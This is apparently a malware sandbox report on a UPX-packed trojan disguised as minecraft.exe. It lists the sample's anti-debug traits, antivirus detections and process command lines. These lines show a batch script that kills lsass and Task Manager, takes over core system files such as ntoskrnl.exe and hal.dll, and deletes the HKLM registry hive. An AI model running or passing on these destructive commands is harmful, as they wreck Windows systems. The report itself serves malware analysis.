Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6403_us | Oct. 31, 2024, 5:50 p.m. | Oct. 31, 2024, 5:52 p.m. |
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\C0DA.tmp\C0DB.tmp\C0EB.bat C:\Users\test22\AppData\Local\Temp\minecraft.exe"
2120-
fsutil.exe fsutil dirty query C:
2220 -
taskkill.exe taskkill /f /im taskmgr.exe
2264 -
taskkill.exe taskkill /f /im regedit.exe
2368 -
takeown.exe takeown /f C:\Windows\System32\hal.dll /r /d y
2452 -
icacls.exe icacls C:\Windows\System32\hal.dll /grant everyone:F /t
2528 -
takeown.exe takeown /f C:\Windows\System32\winload.exe /r /d y
2724 -
icacls.exe icacls C:\Windows\System32\winload.exe /grant everyone:F /t
2776 -
takeown.exe takeown /f C:\Windows\System32\winresume.exe /r /d y
2972 -
icacls.exe icacls C:\Windows\System32\winresume.exe /grant everyone:F /t
3016 -
takeown.exe takeown /f C:\Windows\System32\winlogon.exe /r /d y
2164 -
icacls.exe icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t
2252 -
takeown.exe takeown /f C:\Windows\System32\wininit.exe /r /d y
2316 -
icacls.exe icacls C:\Windows\System32\wininit.exe /grant everyone:F /t
2432 -
takeown.exe takeown /f C:\Windows\System32\ntoskrnl.exe /r /d y
2524 -
icacls.exe icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t
2608 -
takeown.exe takeown /f C:\Windows\System32\regedit.exe /r /d y
1676 -
icacls.exe icacls C:\Windows\System32\regedit.exe /grant everyone:F /t
316 -
takeown.exe takeown /f C:\Windows\System32\taskmgr.exe /r /d y
416 -
icacls.exe icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /t
3000 -
takeown.exe takeown /f C:\Windows\System32\consent.exe /r /d y
2096 -
icacls.exe icacls C:\Windows\System32\consent.exe /grant everyone:F /t
2292 -
takeown.exe takeown /f C:\Windows\System32\drivers /r /d y
2500 -
icacls.exe icacls C:\Windows\System32\drivers /grant everyone:F /t
2548 -
takeown.exe takeown /f C:\Windows\System32\shutdown.exe /r /d y
2012 -
icacls.exe icacls C:\Windows\System32\shutdown.exe /grant everyone:F /t
1896 -
taskkill.exe taskkill /f /im lsass.exe
1668
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\C0DA.tmp\C0DB.tmp\C0EB.bat |
cmdline | "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\C0DA.tmp\C0DB.tmp\C0EB.bat C:\Users\test22\AppData\Local\Temp\minecraft.exe" |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "regedit.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "lsass.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "taskmgr.exe") |
section | {u'size_of_data': u'0x0000d400', u'virtual_address': u'0x00018000', u'entropy': 7.984045486047316, u'name': u'UPX1', u'virtual_size': u'0x0000e000'} | entropy | 7.98404548605 | description | A section with a high entropy has been found | |||||||||
entropy | 0.963636363636 | description | Overall entropy of this PE file is high |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
section | UPX0 | description | Section name indicates UPX | ||||||
section | UPX1 | description | Section name indicates UPX |
cmdline | taskkill /f /im regedit.exe |
cmdline | taskkill /f /im lsass.exe |
cmdline | icacls C:\Windows\System32\shutdown.exe /grant everyone:F /t |
cmdline | fsutil dirty query C: |
cmdline | taskkill /f /im taskmgr.exe |
cmdline | takeown /f C:\Windows\System32\shutdown.exe /r /d y |
cmdline | reg delete HKLM /f |
cmdline | "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\C0DA.tmp\C0DB.tmp\C0EB.bat C:\Users\test22\AppData\Local\Temp\minecraft.exe" |
file | C:\Windows\System32\taskmgr.exe |
file | C:\Windows\System32\drivers\ko-KR\vwifibus.sys.mui |
file | C:\Windows\System32\drivers\amdk8.sys |
file | C:\Windows\System32\drivers\asyncmac.sys |
file | C:\Windows\System32\drivers\ko-KR\intelppm.sys.mui |
file | C:\Windows\System32\drivers\en-US\pcmcia.sys.mui |
file | C:\Windows\System32\drivers\en-US\partmgr.sys.mui |
file | C:\Windows\System32\drivers\filetrace.sys |
file | C:\Windows\System32\drivers\ndisuio.sys |
file | C:\Windows\System32\drivers\WUDFRd.sys |
file | C:\Windows\System32\drivers\monitor.sys |
file | C:\Windows\System32\drivers\WUDFPf.sys |
file | C:\Windows\System32\drivers\ko-KR\http.sys.mui |
file | C:\Windows\System32\drivers\ko-KR\mountmgr.sys.mui |
file | C:\Windows\System32\drivers\portcls.sys |
file | C:\Windows\System32\drivers\wfplwf.sys |
file | C:\Windows\System32\drivers\blbdrive.sys |
file | C:\Windows\System32\drivers\ko-KR\fvevol.sys.mui |
file | C:\Windows\System32\drivers\netbios.sys |
file | C:\Windows\System32\drivers\mstee.sys |
file | C:\Windows\System32\drivers\npfs.sys |
file | C:\Windows\System32\drivers\hidir.sys |
file | C:\Windows\System32\drivers\ko-KR\usbhub.sys.mui |
file | C:\Windows\System32\drivers\en-US\mssmbios.sys.mui |
file | C:\Windows\System32\drivers\RNDISMP.sys |
file | C:\Windows\System32\drivers\en-US\serial.sys.mui |
file | C:\Windows\System32\drivers\rasl2tp.sys |
file | C:\Windows\System32\drivers\srvnet.sys |
file | C:\Windows\System32\drivers\en-US\bthenum.sys.mui |
file | C:\Windows\System32\drivers\ko-KR\bthenum.sys.mui |
file | C:\Windows\System32\drivers\ks.sys |
file | C:\Windows\System32\drivers\ko-KR\cdrom.sys.mui |
file | C:\Windows\System32\drivers\ipnat.sys |
file | C:\Windows\System32\drivers\en-US\BTHUSB.SYS.mui |
file | C:\Windows\System32\drivers\en-US\serscan.sys.mui |
file | C:\Windows\System32\drivers\etc\networks |
file | C:\Windows\System32\drivers\flpydisk.sys |
file | C:\Windows\System32\drivers\lsi_sas2.sys |
file | C:\Windows\System32\drivers\mrxdav.sys |
file | C:\Windows\System32\drivers\ko-KR\wacompen.sys.mui |
file | C:\Windows\System32\drivers\FWPKCLNT.SYS |
file | C:\Windows\System32\drivers\en-US\1394ohci.sys.mui |
file | C:\Windows\System32\drivers\rdyboost.sys |
file | C:\Windows\System32\drivers\wacompen.sys |
file | C:\Windows\System32\drivers\circlass.sys |
file | C:\Windows\System32\drivers\netio.sys |
file | C:\Windows\System32\drivers\ko-KR\ndisuio.sys.mui |
file | C:\Windows\System32\drivers\ko-KR\BrSerId.sys.mui |
file | C:\Windows\System32\drivers\CompositeBus.sys |
file | C:\Windows\System32\drivers\fdc.sys |
file | C:\Windows\System32\drivers\ko-KR\Dot4usb.sys.mui |
cmdline | icacls C:\Windows\System32\wininit.exe /grant everyone:F /t |
cmdline | icacls C:\Windows\System32\regedit.exe /grant everyone:F /t |
cmdline | icacls C:\Windows\System32\winresume.exe /grant everyone:F /t |
cmdline | icacls C:\Windows\System32\ntoskrnl.exe /grant everyone:F /t |
cmdline | icacls C:\Windows\System32\shutdown.exe /grant everyone:F /t |
cmdline | icacls C:\Windows\System32\drivers /grant everyone:F /t |
cmdline | icacls C:\Windows\System32\taskmgr.exe /grant everyone:F /t |
cmdline | icacls C:\Windows\System32\winlogon.exe /grant everyone:F /t |
cmdline | icacls C:\Windows\System32\winload.exe /grant everyone:F /t |
cmdline | icacls C:\Windows\System32\hal.dll /grant everyone:F /t |
cmdline | icacls C:\Windows\System32\consent.exe /grant everyone:F /t |
Bkav | W64.AIDetectMalware |
Lionic | Trojan.Win32.Generic.4!c |
tehtris | Generic.Malware |
Cynet | Malicious (score: 100) |
Skyhigh | BehavesLike.Win64.Generic.qc |
ALYac | Trojan.GenericKD.74521350 |
Cylance | Unsafe |
CrowdStrike | win/malicious_confidence_70% (D) |
BitDefender | Trojan.GenericKD.74520337 |
Arcabit | Trojan.Generic.D4711711 |
VirIT | Trojan.Win64.Agent.CHMP |
Symantec | ML.Attribute.HighConfidence |
Elastic | malicious (moderate confidence) |
APEX | Malicious |
Avast | Win64:Evo-gen [Trj] |
MicroWorld-eScan | Trojan.GenericKD.74520337 |
Emsisoft | Trojan.GenericKD.74520337 (B) |
DrWeb | Trojan.KillProc2.23824 |
McAfeeD | Real Protect-LS!09718D571B01 |
CTX | exe.trojan.generic |
Sophos | Mal/Generic-S |
Ikarus | Trojan.PowerShell.Crypt |
FireEye | Generic.mg.09718d571b01cb93 |
Jiangmin | Trojan.Alien.ga |
Detected | |
Antiy-AVL | Trojan/Win32.Phonzy |
Kingsoft | malware.kb.b.986 |
Gridinsoft | Trojan.Win64.Agent.sa |
Xcitium | Malware@#36w60dwm4dpfh |
Microsoft | Trojan:Win32/Bankinc |
GData | Trojan.GenericKD.74520337 |
Varist | W64/Agent.CAU.gen!Eldorado |
AhnLab-V3 | Malware/Win.Generic.R426832 |
McAfee | Artemis!09718D571B01 |
DeepInstinct | MALICIOUS |
Malwarebytes | Generic.Malware.AI.DDS |
Panda | Trj/Chgt.AD |
MaxSecure | Trojan.Malware.300983.susgen |
Fortinet | W64/Agent.4987!tr |
AVG | Win64:Evo-gen [Trj] |
Paloalto | generic.ml |
alibabacloud | Trojan:Win/Bankinc.Gen |